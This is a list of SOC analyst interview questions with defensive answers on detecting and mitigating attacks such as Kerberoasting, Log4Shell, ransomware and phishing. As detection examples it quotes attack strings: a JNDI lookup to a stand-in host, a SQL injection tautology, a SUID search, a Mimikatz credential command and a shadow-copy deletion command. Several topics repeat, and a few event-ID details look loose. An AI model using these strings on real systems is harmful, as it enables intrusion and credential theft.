Security Operations Center (SOC) Analyst interview

questions along with their answers:

1. What is a SOC, and what are its primary functions?

Answer:
A Security Operations Center (SOC) is a centralized unit that monitors, detects, analyzes,
and responds to cybersecurity incidents in real time. Its primary functions include:

Continuous Monitoring (24/7 security monitoring)

Threat Detection & Analysis
Incident Response (containment, eradication, and recovery)
Vulnerability Management
Threat Intelligence & Hunting
Compliance & Reporting

2. What are the different levels in a SOC team?

Answer:
SOC teams are typically structured into three levels:

L1 (Tier 1) - Security Analyst: Monitors alerts, performs initial analysis, and escalates
incidents.
L2 (Tier 2) - Incident Responder: Investigates security incidents, identifies threats, and
contains attacks.
L3 (Tier 3) - Threat Hunter/Forensic Analyst: Conducts deep threat analysis, digital
forensics, and proactive threat hunting.

3. What are SIEM tools, and how do they work?

Answer:
Security Information and Event Management (SIEM) tools collect, analyze, and correlate
security event logs from different sources to detect threats. Popular SIEM tools include:

Splunk
IBM QRadar
ELK Stack
ArcSight
Microsoft Sentinel

SIEM tools work by:

1. Collecting Logs from firewalls, IDS/IPS, servers, endpoints, and applications.

2. Correlating Data to identify potential threats.
3. Generating Alerts for suspicious activities.
4. Providing Incident Investigation tools and dashboards.
4. What is the difference between IDS and IPS?

Answer:

Feature IDS (Intrusion Detection IPS (Intrusion Prevention

System) System)

Function Monitors network traffic Monitors and actively

for threats blocks threats

Action Alerts SOC team Blocks malicious traffic

automatically

Placement Passive; placed inside the Active; placed in-line with

network network traffic

Example Tools Snort, Suricata, Zeek Cisco Firepower, Palo Alto

IPS, Suricata IPS

5. What is a false positive and false negative in cybersecurity?

Answer:

False Positive: A security alert that is triggered but is not an actual threat.
False Negative: A real threat that goes undetected.

For example:

If a SIEM flags normal user activity as an attack, it’s a false positive.

If a malware attack bypasses the security system without detection, it’s a false negative.

6. How would you respond to a phishing attack in a SOC?

Answer:

1. Identify the phishing email – Analyze the email headers, links, and attachments.
2. Isolate affected systems – If a user clicks a malicious link, disconnect the system.
3. Check logs in SIEM – Look for IOCs (Indicators of Compromise) related to phishing.
4. Block malicious domains/IPs – Add to firewall/IDS/IPS rules.
5. Educate the user – Provide security awareness training.
6. Report and Document – Maintain an incident response report for further analysis.

7. What are Indicators of Compromise (IoCs)?

Answer:
IoCs are forensic clues that indicate a security breach or malicious activity. Examples
include:

Malicious IP addresses
Suspicious domain names (e.g., phishing URLs)
Unusual file hashes (MD5, SHA-256)
Anomalous user behavior (e.g., failed login attempts)
Presence of malware signatures

8. What is Threat Intelligence, and why is it important?

Answer:
Threat Intelligence involves collecting, analyzing, and sharing information about cyber
threats to enhance security defenses. It helps in:

Identifying new attack vectors

Preventing future attacks
Improving incident response
Reducing false positives in SIEM

Sources of threat intelligence include:

Open Threat Feeds (AlienVault OTX, VirusTotal, AbuseIPDB)

Paid Threat Intelligence Services (IBM X-Force, FireEye, Recorded Future)

9. What steps would you take if a system is infected with malware?

Answer:

1. Isolate the infected system to prevent spread.

2. Analyze logs and malware samples using tools like Wireshark, Procmon, or VirusTotal.
3. Identify the attack vector (email, download, exploit, etc.).
4. Remove the malware using endpoint security tools (Windows Defender, Malwarebytes).
5. Patch vulnerabilities (OS updates, security patches).
6. Monitor network traffic for further threats.
7. Perform a forensic investigation to prevent future incidents.

10. What tools do SOC Analysts commonly use?

Answer:
SOC Analysts use various tools for monitoring, detection, and response:

SIEM Tools: Splunk, QRadar, ArcSight

Network Monitoring: Wireshark, Zeek
Endpoint Security: CrowdStrike, Carbon Black
Threat Intelligence: AlienVault OTX, VirusTotal
Forensics & Analysis: Autopsy, Volatility
 Log Analysis: Graylog, LogRhythm

11. How do you analyze suspicious network traffic?

Answer:

1. Capture network packets using Wireshark or Zeek.

2. Analyze abnormal patterns (e.g., unusual ports, excessive connections).
3. Check IP reputation using threat intelligence platforms.
4. Look for encrypted or obfuscated traffic (e.g., beaconing behavior).
5. Correlate with SIEM alerts to check for known attack signatures.

12. What are some common cyber attack techniques?

Answer:

Phishing – Tricking users into revealing credentials.

Brute Force Attack – Trying multiple passwords to gain access.
SQL Injection – Exploiting web vulnerabilities in SQL databases.
DDoS Attack – Overloading a system with malicious traffic.
Privilege Escalation – Gaining higher access rights.
MITM (Man-in-the-Middle) – Intercepting communications.
Ransomware – Encrypting files and demanding ransom.

13. How do you handle an insider threat?

Answer:

1. Monitor user activities for unusual behavior (e.g., unauthorized access).

2. Use DLP (Data Loss Prevention) tools to prevent data leaks.
3. Implement least privilege access controls (Zero Trust Model).
4. Conduct regular security awareness training.
5. Audit logs and analyze anomalies in SIEM.

14. What is the MITRE ATT&CK Framework?

Answer:
The MITRE ATT&CK Framework is a knowledge base of tactics, techniques, and procedures
(TTPs) used by adversaries. It helps SOC teams in:

Threat detection and analysis

Incident response planning
Red and blue team operations

Example Tactics:

Initial Access (Phishing, Exploits)

Execution (Malicious Scripts, PowerShell)
Persistence (Backdoors, Scheduled Tasks)
15. What is Zero Trust Security?

Answer:
Zero Trust Security is a model that assumes no entity (internal or external) can be trusted
by default. It requires:

Multi-factor authentication (MFA)

Least privilege access
Continuous monitoring
Network segmentation

16. What is a Security Orchestration, Automation, and Response (SOAR) tool?

Answer:
A SOAR tool is used to automate security operations by integrating with SIEM, firewalls, and
threat intelligence platforms. It helps in:

Automating repetitive tasks (e.g., blocking malicious IPs).

Reducing response time for security incidents.
Providing playbooks for incident response.

Examples: Splunk Phantom, Palo Alto Cortex XSOAR, IBM Resilient.

17. What is an Advanced Persistent Threat (APT)?

Answer:
An APT is a long-term, stealthy attack by a well-funded adversary (often state-sponsored).
Characteristics include:

Persistent access to networks.

Multiple attack vectors (e.g., phishing, zero-day exploits).
Data exfiltration over time.

Example APT Groups: APT29 (Russia), APT41 (China), Lazarus Group (North Korea).

18. How would you detect and mitigate a DNS tunneling attack?

Answer:
Detection:

Monitor unusual DNS queries (e.g., long subdomains, frequent requests).

Use DNS filtering tools (e.g., OpenDNS, Palo Alto DNS Security).
Analyze SIEM logs for excessive outbound DNS traffic.

Mitigation:
 Block suspicious domains.
Use firewalls to inspect DNS traffic.
Restrict external DNS resolution to trusted sources.

19. What is the difference between Tactics, Techniques, and Procedures (TTPs)?

Answer:

Tactics: The high-level goals of an attacker (e.g., persistence, privilege escalation).

Techniques: The methods used to achieve those goals (e.g., credential dumping,
phishing).
Procedures: The exact steps used by a specific threat actor (e.g., using Mimikatz for
credential theft).

This structure is used in frameworks like MITRE ATT&CK.

20. How do you investigate a brute-force attack?

Answer:

1. Check failed login attempts in SIEM logs.

2. Identify source IPs – Are they from known malicious addresses?
3. Look for automation patterns – High request rates indicate bots.
4. Monitor account lockouts – Too many may indicate an attack.
5. Mitigate:
Implement rate limiting & account lockout policies.
Use multi-factor authentication (MFA).
Block malicious IPs on firewalls.

21. How do you perform log analysis in a SOC?

Answer:

1. Collect logs from multiple sources (firewalls, endpoints, SIEM).

2. Normalize and correlate logs using SIEM tools.
3. Look for anomalies like repeated failed logins, unusual traffic spikes.
4. Investigate flagged events – Use threat intelligence feeds.
5. Generate incident reports and take action accordingly.

Tools: Splunk, Graylog, LogRhythm.

22. What are Honeytokens, and how are they used in security?

Answer:
Honeytokens are fake credentials, API keys, or database entries placed in a system to
detect unauthorized access. If they are used, it indicates a breach.

Examples:
 Fake admin credentials in Active Directory.
Dummy AWS access keys to detect attackers scanning for cloud resources.

23. What is a Web Application Firewall (WAF), and how does it work?

Answer:
A WAF protects web applications from threats like:

SQL Injection
Cross-Site Scripting (XSS)
DDoS attacks

How it works:

Inspects HTTP requests.

Blocks or allows traffic based on predefined rules.

Examples: Cloudflare WAF, AWS WAF, ModSecurity.

24. How do you differentiate between symmetric and asymmetric encryption?

Answer:

Feature Symmetric Encryption Asymmetric Encryption

Keys Used Single secret key Public & private key pair

Speed Faster Slower

Example Algorithms AES, DES RSA, ECC

Usage Data encryption Digital signatures, SSL/TLS

25. What is a Pass-the-Hash (PtH) attack?

Answer:
A Pass-the-Hash (PtH) attack occurs when an attacker captures hashed credentials and
reuses them to authenticate without knowing the actual password.

Mitigation:

Enforce MFA and Windows Credential Guard.

Disable NTLM authentication if not needed.
Monitor lateral movement in logs.
26. How do you analyze PowerShell attack logs?

Answer:

1. Enable PowerShell logging (Windows Event ID 4104).

2. Check for obfuscated commands (e.g., base64-encoded scripts).
3. Analyze script execution patterns (e.g., downloading external files).
4. Use YARA rules to detect malicious PowerShell usage.

Tool: Sysmon, Windows Event Viewer, Splunk.

27. How would you detect data exfiltration?

Answer:

Monitor outbound network traffic – Large data transfers may indicate leaks.
Use DLP solutions (Data Loss Prevention) to block sensitive file movements.
Check endpoint logs for USB file transfers.
Identify unauthorized cloud uploads (Dropbox, Google Drive).

28. What is a Golden Ticket attack?

Answer:
A Golden Ticket attack is a Kerberos authentication exploit where an attacker creates a
forged ticket to gain persistent domain access.

Mitigation:

Monitor Event ID 4769 (TGT requests).

Rotate KRBTGT account password periodically.
Implement privileged access management (PAM).

29. What is a Living-off-the-Land (LotL) attack?

Answer:
LotL attacks use legitimate system tools (e.g., PowerShell, WMI, PsExec) to evade detection.

Examples:

Using PowerShell scripts for malware execution.

Exploiting MSBuild.exe to run malicious code.

Mitigation:

Restrict admin tool usage.

Monitor script execution logs.

30. What is Fileless Malware?

Answer:
Fileless Malware runs in memory instead of being written to disk, making it hard to detect.

Detection:

Monitor script execution in logs.

Use EDR tools (CrowdStrike, SentinelOne).

Examples:

PowerShell-based attacks.
Exploiting Windows registry for persistence.

31. How do you analyze a ransomware attack?

Answer:

1. Identify affected systems and isolate them.

2. Check for ransom notes (common filenames: README.txt).
3. Analyze encryption patterns and detect malware signatures.
4. Restore from backups if available.
5. Block IOCs (IPs, domains, hashes) in security tools.

Common Ransomware Families: WannaCry, Ryuk, LockBit.

32. How do you prevent insider threats?

Answer:

Implement User Behavior Analytics (UBA) to detect anomalies.

Use role-based access control (RBAC).
Enforce strict data access policies.
Conduct regular security awareness training.

33. How does an attacker perform privilege escalation?

Answer:

Exploiting misconfigured permissions (e.g., weak sudo rules in Linux).

Credential dumping (Mimikatz for Windows).
Abusing SUID binaries in Linux (find / -perm -4000).
DLL hijacking in Windows.

34. How do you investigate an SSH brute-force attack?

Answer:

Analyze auth.log (/var/log/auth.log) for failed logins.

Identify brute-force IPs and block them in iptables or fail2ban.
Enforce key-based authentication.
 Implement rate-limiting (e.g., MaxAuthTries in SSH config).

35. What is the difference between EDR, XDR, and MDR?

Answer:

EDR (Endpoint Detection & Response) → Focuses on endpoint threats. (e.g., CrowdStrike,
SentinelOne)
XDR (Extended Detection & Response) → Expands EDR to network, cloud, and email
security. (e.g., Palo Alto Cortex XDR)
MDR (Managed Detection & Response) → Outsourced SOC service that monitors security
24/7.

36. How do you detect and prevent Log4j (Log4Shell) exploitation?

Answer:

Detection:
Use SIEM to monitor logs for ${jndi:ldap://malicious.com} patterns.
Inspect web server logs for unusual JNDI requests.
Prevention:
Patch Log4j to 2.17.1+.
Use WAF rules to block suspicious requests.

37. How do you analyze an LLMNR/NBT-NS poisoning attack?

Answer:

Look for unexpected name resolution requests in logs.

Check if Responder tool was used (common attacker tool).
Mitigation:
Disable LLMNR and NBT-NS via Group Policy.
Enforce SMB signing to prevent credential theft.

38. What are the differences between IPS and IDS?

 Feature IDS (Intrusion Detection IPS (Intrusion Prevention
System) System)

Function Detects threats Detects & blocks threats

Placement Monitors network traffic Inline, actively blocks

attacks

Action Alerts SOC team Automatically takes action

Examples Snort, Suricata Palo Alto, Cisco Firepower

39. How do you handle an alert for a potential zero-day attack?

Answer:

1. Validate the alert – Check logs and behavior analysis.

2. Identify affected systems – Isolate them if necessary.
3. Search threat intelligence feeds for IOCs.
4. Apply compensating controls (e.g., firewall rules, endpoint blocking).
5. Report to the vendor for a patch.

40. What is a DCSync attack?

Answer:
A DCSync attack allows attackers to impersonate a Domain Controller and request
credentials from Active Directory.

Detection:

Monitor for Event ID 4662 (replication requests).

Look for unusual access to DC accounts.

Prevention:

Restrict replication privileges to DCs only.

Implement LAPS & tiered admin accounts.

41. How do you detect an SQL injection attack?

Answer:

Look for suspicious SQL queries in web logs (' OR '1'='1').

Check SIEM alerts for multiple failed authentication attempts.
 Enable Web Application Firewall (WAF).
Use parameterized queries to sanitize input.

42. How do you analyze Windows Event ID 4625?

Answer:
Windows Event ID 4625 logs failed logins.

Check for multiple failed attempts from a single IP → Possible brute force.
Look at the Logon Type (e.g., 3 = network, 10 = remote login).
Correlate with Event ID 4720 (new account creation).

43. What is an ELF binary, and how do you analyze it for malware?

Answer:
An ELF (Executable and Linkable Format) file is a binary used in Linux.

Malware Analysis:

1. Run strings to check for hidden messages.

2. Use file command to determine its type.
3. Run objdump -d to disassemble the code.
4. Check for persistence methods (cronjobs, rootkits).

44. How does an attacker exploit a misconfigured S3 bucket?

Answer:

Public-read/write permissions allow data theft.

Bucket listing exposure reveals files to attackers.
Mitigation:
Use IAM policies for access control.
Enable server-side encryption.
Audit with AWS CloudTrail logs.

45. How do you identify a Kerberoasting attack?

Answer:

Look for Event ID 4769 (TGS requests).

Monitor SPN (Service Principal Name) requests for anomalies.
Mitigation:
Use strong Kerberos service account passwords.
Implement Managed Service Accounts (MSA).

46. What is the difference between Malware and a Rootkit?

 Feature Malware Rootkit

Definition Any malicious software Malware that hides itself

Detection Antivirus & EDR Very difficult (hides in

kernel)

Example Ransomware, spyware TDL4, Stuxnet

47. How do you detect a MITM (Man-in-the-Middle) attack?

Answer:

Check ARP table inconsistencies (arp -a).

Use Wireshark to detect abnormal network traffic.
Enable HTTPS and TLS encryption to prevent attacks.

48. What is a Golden SAML attack?

Answer:

A Golden SAML attack is an SSO attack where an attacker forges authentication tokens.
Mitigation:
Rotate SAML signing certificates.
Use multi-factor authentication (MFA).

49. How does a BlueKeep vulnerability work?

Answer:

BlueKeep (CVE-2019-0708) is an RDP vulnerability in Windows.

Exploited using buffer overflow to gain remote access.
Mitigation:
Patch Windows.
Disable RDP if not needed.
Enable Network Level Authentication (NLA).

50. How do you detect a compromised IoT device in a network?

Answer:

Monitor unusual network traffic from IoT devices.

Use SIEM for anomaly detection.
Check for new unauthorized open ports.
Apply firmware updates to prevent exploits.
51. How do you investigate a BEC (Business Email Compromise) attack?

Answer:

1. Analyze email headers (Received-SPF and DKIM checks).

2. Look for unusual login activity in Microsoft 365 / Google Workspace.
3. Identify fraudulent domain lookalikes (examp1e.com instead of example.com).
4. Reset credentials and enforce MFA.

52. What is a heap spray attack?

Answer:
A heap spray attack loads malicious code into memory and forces an application to execute
it.

Common in browser exploits.

Mitigation:
Use DEP (Data Execution Prevention).
Implement Address Space Layout Randomization (ASLR).

53. How does an attacker exploit an open Redis database?

Answer:

If Redis runs as root, attackers can write SSH keys for backdoor access.
Mitigation:
Bind Redis to localhost only.
Require password authentication.
Use firewalls to restrict access.

54. How do you investigate an NTFS alternate data stream (ADS) attack?

Answer:

Use dir /R to list hidden ADS files.

Check if malware hides within ADS streams.
Use streams.exe to analyze hidden content.

55. What is an Evil Twin attack?

Answer:
An Evil Twin attack creates a fake Wi-Fi hotspot to steal user credentials.

Mitigation:
Use VPNs on public Wi-Fi.
Avoid auto-connecting to open networks.
56. What is a DNS Tunneling attack, and how do you detect it?

Answer:

DNS Tunneling encodes malicious traffic inside DNS queries.

Detection:
Monitor for excessively long DNS queries.
Identify frequent DNS requests to unusual domains.
Use SIEM correlation rules for DNS traffic analysis.
Mitigation:
Block untrusted DNS resolvers.
Implement DNS filtering (Pi-hole, Cisco Umbrella).

57. What is a Watering Hole attack?

Answer:

Attackers compromise a legitimate website frequently visited by their targets.

They inject malicious scripts to infect users.
Detection:
Monitor for outbound traffic to newly registered domains.
Use sandbox analysis for suspicious JavaScript.
Mitigation:
Enforce browser security updates.
Use web filtering and URL reputation services.

58. What is Process Injection, and how do you detect it?

Answer:

Process injection allows malware to run inside legitimate processes to avoid detection.
Common techniques:
DLL Injection (e.g., using CreateRemoteThread).
Code Hollowing (overwriting a process in memory).
Detection:
Use Sysmon Event ID 8 (CreateRemoteThread).
Monitor Windows Event ID 4688 (Process Creation).
Mitigation:
Enable LSA protection to prevent credential theft.

59. How do you analyze an RDP brute force attack?

Answer:

Look for Event ID 4625 (failed logins) from the same IP.
Check for suspicious user agents in logs.
Correlate with Event ID 4776 (authentication failures).
 Mitigation:
Enable Account Lockout Policy.
Implement RDP MFA and Network Level Authentication (NLA).

60. What is an AS-REP Roasting attack?

Answer:

Exploits Kerberos accounts without pre-authentication enabled.

Attackers request a TGT (Ticket Granting Ticket) and brute-force it offline.
Detection:
Look for Event ID 4768 without pre-authentication required.
Monitor Kerberos TGT requests for anomalies.
Mitigation:
Enforce pre-authentication for all users.
Use strong passwords and MFA.

61. How does a Silver Ticket attack work?

Answer:

Attackers forge TGS (Ticket Granting Service) tickets for lateral movement.
Detection:
Look for Event ID 4769 (TGS requests) with unusual activity.
Check for service access from unexpected accounts.
Mitigation:
Rotate service account passwords regularly.
Implement LSA Protection and Protected Users Group.

62. What is a BPFdoor backdoor, and how do you detect it?

Answer:

BPFdoor is a Linux backdoor that uses Berkeley Packet Filter (BPF) for stealth.
Detection:
Monitor for abnormal open ports with lsof -i.
Check for hidden processes using ps aux | grep bpfd.
Look for network traffic anomalies.
Mitigation:
Use EDR solutions for Linux (Falco, Wazuh).
Restrict root access and disable unused services.

63. How do you investigate a credential stuffing attack?

Answer:

Credential stuffing reuses leaked usernames/passwords on multiple sites.

Detection:
Monitor for mass login attempts from one IP.
 Identify rapid failed logins from multiple locations.
Mitigation:
Enforce MFA and CAPTCHA on login portals.
Implement rate limiting on login attempts.

64. What is Living Off the Land (LotL) attack, and how do you detect it?

Answer:

Attackers use legitimate system tools (e.g., PowerShell, wmic, rundll32).

Detection:
Monitor for unusual PowerShell execution (Event ID 4104).
Track wmic process call create executions.
Mitigation:
Restrict PowerShell execution policies.
Use Application Whitelisting (AppLocker, WDAC).

65. How does an attacker use Cobalt Strike, and how do you detect it?

Answer:

Cobalt Strike is a red teaming tool often used by threat actors.

Detection:
Look for Jitter-based C2 beaconing traffic.
Check for DNS over HTTPS (DoH) exfiltration.
Mitigation:
Block common Cobalt Strike payloads using YARA rules.
Use endpoint monitoring tools (Sysmon, Velociraptor).

66. How do you analyze an NTLM Relay attack?

Answer:

NTLM relay exploits weak authentication to steal credentials.

Detection:
Monitor for SMB authentication from non-DC sources.
Identify NTLMv1 usage (Event ID 8004).
Mitigation:
Enforce Kerberos authentication over NTLM.
Disable SMBv1 and LLMNR.

67. How do you investigate a VPN compromise?

Answer:

Check for unusual VPN logins (from foreign IPs).

Look for multiple concurrent logins from different locations.
Monitor VPN session durations for anomalies.
Mitigation:
 Enforce MFA for VPN access.
Implement Geo-blocking for unauthorized regions.

68. How does an attacker exploit an exposed Elasticsearch instance?

Answer:

Unauthenticated Elasticsearch databases can be accessed remotely.

Detection:
Check for unauthorized API requests (_search?pretty).
Look for data exfiltration via large responses.
Mitigation:
Restrict access with firewall rules.
Enable authentication and TLS encryption.

69. How do you respond to a suspected insider threat?

Answer:

Monitor for data exfiltration via USB or email.

Review SIEM alerts for unusual logins from internal users.
Analyze privilege escalation events.
Mitigation:
Implement User and Entity Behavior Analytics (UEBA).
Restrict USB device usage with DLP policies.

70. How do you detect a phishing email without opening it?

Answer:

Check the email headers (Received-SPF, DKIM, DMARC).

Look for misspelled sender domains (microsoft-support.com).
Hover over links to detect fake URLs.
Use VirusTotal to scan attachments.

71. What is an LSASS Dump, and how do you detect it?

Answer:

LSASS (Local Security Authority Subsystem Service) dumping is used to extract

credentials from memory.
Attackers use tools like Mimikatz, taskmgr.exe, procdump.exe.
Detection:
Sysmon Event ID 10 (ProcessAccess) with LSASS target.
Windows Event ID 4656 (Handle Request for LSASS).
Unexpected access to lsass.exe by non-standard processes.
Mitigation:
 Enable Credential Guard.
Restrict LSASS memory access (RunAsPPL registry setting).

72. What is Kerberoasting, and how do you detect it?

Answer:

Attackers extract Kerberos TGS (service tickets) and brute-force them offline.
Detection:
Look for Event ID 4769 (TGS Request) with RC4 encryption.
Monitor for large numbers of TGS requests from a single user.
Mitigation:
Enforce AES encryption for Kerberos tickets.
Use strong, randomly generated passwords for service accounts.

73. How do you detect a Golden Ticket attack?

Answer:

Attackers create a forged TGT (Ticket Granting Ticket) with unlimited access.
Detection:
Event ID 4769 with unusual TGT lifetimes.
Look for accounts granting access to multiple unrelated systems.
Monitor for high-privilege account logins at odd hours.
Mitigation:
Regularly reset krbtgt account passwords.
Enable SID Filtering and Protected Users Group.

74. What is a Pass-the-Ticket (PtT) attack, and how do you detect it?

Answer:

Attackers use stolen Kerberos tickets to access systems.

Detection:
Event ID 4769 (TGS Requests) from unusual hosts.
Multiple logins from different locations within a short time.
Mitigation:
Enable logon restrictions for high-privilege accounts.
Deploy Managed Service Accounts (MSA).

75. How do you detect an EternalBlue attack?

Answer:

EternalBlue exploits SMBv1 vulnerabilities to spread malware (WannaCry, NotPetya).

Detection:
Event ID 4672 (Privileged Logon) from unexpected systems.
High SMB traffic spikes (port 445) from infected hosts.
Look for unauthorized modifications to lsass.exe or services.exe.
 Mitigation:
Disable SMBv1 (Set-SmbServerConfiguration -EnableSMB1Protocol $false).
Patch Windows systems (MS17-010).

76. How do you analyze a DCSync attack?

Answer:

DCSync is used to steal password hashes by imitating a domain controller.

Detection:
Event ID 4662 (Directory Service Access) targeting DS-Replication-Get-Changes).
Event ID 4742 (Modification of privileged accounts).
Mitigation:
Restrict DC replication permissions to necessary accounts only.
Use LAPS (Local Administrator Password Solution).

77. How do you detect a Rogue DHCP Server on the network?

Answer:

Attackers set up malicious DHCP servers to provide fake network configurations.

Detection:
Use Wireshark to identify multiple DHCP Offer packets from different sources.
Check for unauthorized devices responding to DHCP Discover requests.
Mitigation:
Enable DHCP Snooping on switches.
Use 802.1X authentication.

78. How do you detect DNS Cache Poisoning?

Answer:

Attackers manipulate DNS cache entries to redirect traffic.

Detection:
Monitor for unexpected changes in DNS A records.
Check for unusual domain resolution anomalies.
Mitigation:
Use DNSSEC to validate DNS responses.
Implement endpoint DNS monitoring.

79. How do you detect an AWS S3 bucket misconfiguration?

Answer:

Public S3 buckets may expose sensitive data.

Detection:
Scan for open S3 buckets using aws s3api list-buckets.
Use CloudTrail logs to monitor unauthorized access attempts.
Mitigation:
 Restrict S3 bucket access to specific IAM roles.
Enable S3 Block Public Access settings.

80. What are the signs of an Insider Threat attack?

Answer:

Unusual access to high-risk files.

Excessive USB drive usage.
Attempts to disable security software.
Frequent access to HR or financial data.
Mitigation:
Use User and Entity Behavior Analytics (UEBA).
Implement DLP (Data Loss Prevention) policies.

81. What is a Honeytoken, and how is it used?

Answer:

A Honeytoken is a fake credential placed in logs or databases to detect attackers.

Usage:
If accessed, it triggers an alert.
Example:
A fake AWS access key in config.json that sends an alert if used.

82. How do you detect Google Workspace (GSuite) account takeovers?

Answer:

Look for logins from suspicious locations.

Monitor for changes in MFA settings.
Identify bulk email forwarding rules added suddenly.
Mitigation:
Enable Google Advanced Protection.
Use Google Security Investigation Tool.

83. How do you detect a Zero-Logon attack (CVE-2020-1472)?

Answer:

Zero-Logon exploits weak cryptographic authentication in Netlogon.

Detection:
Event ID 4742 (Account modifications on DC).
Large numbers of Netlogon authentication failures.
Mitigation:
Apply Microsoft patch for CVE-2020-1472.
Restrict Netlogon connections to trusted hosts.

84. How do you investigate an IoT device compromise?

Answer:

Monitor IoT logs for unauthorized firmware updates.

Check DNS queries to unexpected domains.
Look for outbound traffic spikes from IoT devices.
Mitigation:
Use network segmentation for IoT.
Apply firmware updates regularly.

85. What is an Evil Twin attack, and how do you detect it?

Answer:

An Evil Twin is a rogue Wi-Fi access point that mimics a legitimate network.
Detection:
Use Wireshark to identify APs with identical SSIDs.
Monitor for multiple MAC addresses broadcasting the same network name.
Mitigation:
Enable WPA3 authentication.
Use VPN on public Wi-Fi.

86. What is a Silver Ticket attack, and how do you detect it?

Answer:

Attackers forge a TGS (Service Ticket) for a specific service without interacting with the
DC.
Detection:
Monitor Event ID 4769 (TGS Request) with RC4 encryption.
Look for logins bypassing Kerberos TGT validation.
Mitigation:
Use AES-only authentication.
Rotate service account passwords regularly.

87. How do you detect a Slowloris attack?

Answer:

Slowloris keeps HTTP connections open without completing requests.

Detection:
Monitor for high numbers of half-open HTTP connections.
Identify requests with incomplete headers.
Mitigation:
Use reverse proxies like Nginx or Cloudflare.
Set timeouts on HTTP headers.

88. What is Fileless Malware, and how do you detect it?

Answer:

Malware that resides only in memory without writing files to disk.

Detection:
Look for PowerShell scripts executing base64-encoded commands.
Check for WMI, Registry, or Scheduled Task persistence.
Mitigation:
Enable Windows Defender AMSI.
Restrict PowerShell execution policies.

89. How do you detect a Brute Ratel C4 (BRC4) attack?

Answer:

Brute Ratel is a stealthy post-exploitation framework used by APTs.

Detection:
Monitor for unusual network connections to uncommon ports.
Look for processes making C2 connections over HTTP/S.
Mitigation:
Block known Brute Ratel signatures in EDR/XDR.
Use Threat Intelligence feeds to detect C2 infrastructure.

90. How do you detect an LLMNR/NBT-NS Poisoning attack?

Answer:

Attackers use Responder to capture NTLM hashes from misconfigured networks.

Detection:
Look for unexpected LLMNR/NBT-NS traffic in Wireshark.
Monitor for Event ID 8004 (Suspicious LLMNR queries).
Mitigation:
Disable LLMNR and NetBIOS over TCP/IP.
Enforce SMB Signing and NTLMv2-only authentication.

91. How do you detect an OAuth Phishing attack?

Answer:

Attackers trick users into granting OAuth tokens to a malicious app.

Detection:
Monitor for unusual third-party app permissions in Microsoft 365.
Use SIEM to detect OAuth token grants from untrusted locations.
Mitigation:
Enable OAuth consent policies.
Restrict OAuth to approved applications only.

92. How do you investigate a SIM Swapping attack?

Answer:
 Attackers steal phone numbers to bypass 2FA.
Detection:
Look for sudden changes in 2FA delivery methods.
Monitor for multiple failed 2FA login attempts.
Mitigation:
Use hardware-based authentication (YubiKey, FIDO2).
Enable carrier PINs for SIM protection.

93. What is Magecart, and how do you detect it?

Answer:

Magecart is a web skimming attack that steals credit card details from checkout pages.
Detection:
Monitor for unauthorized JavaScript changes in e-commerce sites.
Look for unusual external domains in network requests.
Mitigation:
Implement Subresource Integrity (SRI) for JavaScript.
Regularly scan for unauthorized script injections.

94. What is a Living-Off-the-Land (LotL) attack, and how do you detect it?

Answer:

Attackers use built-in system tools like rundll32.exe, wmic.exe, or powershell.exe.

Detection:
Monitor for unusual parent-child process relationships.
Check for PowerShell execution with encoded commands.
Mitigation:
Restrict execution of non-signed PowerShell scripts.
Enable attack surface reduction rules.

95. How do you detect a Business Email Compromise (BEC) attack?

Answer:

Attackers spoof or compromise executive email accounts to request fund transfers.

Detection:
Look for sudden changes in email forwarding rules.
Monitor for login attempts from unexpected locations.
Mitigation:
Implement DMARC, DKIM, and SPF records.
Require multi-factor authentication (MFA) for all email accounts.

96. What is Mimikatz and how do you detect it?

Answer:

Mimikatz extracts passwords and Kerberos tickets from Windows memory.

 Detection:
Look for Sysmon Event ID 10 (ProcessAccess) on lsass.exe.
Monitor for unexpected use of sekurlsa::logonpasswords.
Mitigation:
Use Credential Guard to prevent memory dumping.
Restrict LSASS access with RunAsPPL registry setting.

97. How do you detect a Ransomware attack in progress?

Answer:

Look for mass file encryption with unknown extensions.

Monitor for Event ID 4663 (File modifications on sensitive files).
Detect processes deleting Shadow Copies (vssadmin delete shadows).
Mitigation:
Enable Ransomware protection in Windows Defender.
Implement offline backups and immutable storage.

98. How do you detect a Malicious Insider in your organization?

Answer:

Look for large amounts of data copied to USB devices.

Detect high file access rates outside normal working hours.
Monitor for unauthorized access to financial or HR systems.
Mitigation:
Use DLP (Data Loss Prevention) solutions.
Implement zero-trust security policies.

99. What is an NTLM Relay Attack, and how do you prevent it?

Answer:

Attackers intercept and relay NTLM authentication traffic.

Detection:
Look for unexpected SMB authentication attempts on non-DC hosts.
Monitor for Event ID 4776 (NTLM authentication failures).
Mitigation:
Disable NTLM authentication where possible.
Enforce SMB Signing and LDAP Channel Binding.

100. What are some key KPIs for a SOC team?

Answer:

Mean Time to Detect (MTTD) – How fast threats are identified.

Mean Time to Respond (MTTR) – How quickly incidents are contained.
False Positive Rate – Percentage of non-malicious alerts.
Dwell Time – How long attackers remain undetected.
 Threat Coverage – Percentage of attack techniques monitored.

101. How do you detect a Pass-the-Hash (PtH) attack?

Answer:

Pass-the-Hash allows attackers to authenticate without knowing plaintext credentials.

Detection:
Look for NTLM authentication without an associated Kerberos ticket.
Monitor for Event ID 4624 (Type 3 or 10 logins with NTLM hashes).
Mitigation:
Use Windows Defender Credential Guard.
Restrict NTLM authentication and enforce Kerberos-only authentication.

102. What is a Golden SAML attack, and how do you detect it?

Answer:

Attackers forge SAML authentication tokens to access cloud services.

Detection:
Look for SAML assertions with unusual issuer information.
Monitor for cloud logins without MFA challenges.
Mitigation:
Rotate Active Directory Federation Services (ADFS) signing certificates.
Implement Azure Conditional Access policies.

103. How do you detect Domain Fronting?

Answer:

Attackers use legitimate CDNs (Cloudflare, Akamai, AWS) to hide malicious traffic.
Detection:
Look for mismatches between HTTP Host headers and TLS SNI fields.
Monitor anomalous domain requests within encrypted traffic.
Mitigation:
Block unused CDNs at firewall level.
Use DPI (Deep Packet Inspection) to analyze SNI fields.

104. How do you detect a Kerberoasting attack?

Answer:

Attackers request TGS (Service Tickets) to extract service account hashes.

Detection:
Monitor for Event ID 4769 (TGS requests with RC4 encryption).
 Check for multiple TGS requests targeting high-privilege accounts.
Mitigation:
Enforce AES-only encryption for service accounts.
Rotate service account passwords frequently.

105. How do you investigate a VPN account takeover?

Answer:

Look for VPN logins from multiple locations in a short time.

Detect login attempts using previously breached credentials.
Check for sudden changes in MFA settings or IP address anomalies.
Mitigation:
Enforce geofencing for VPN logins.
Require hardware-based MFA (YubiKey, FIDO2).

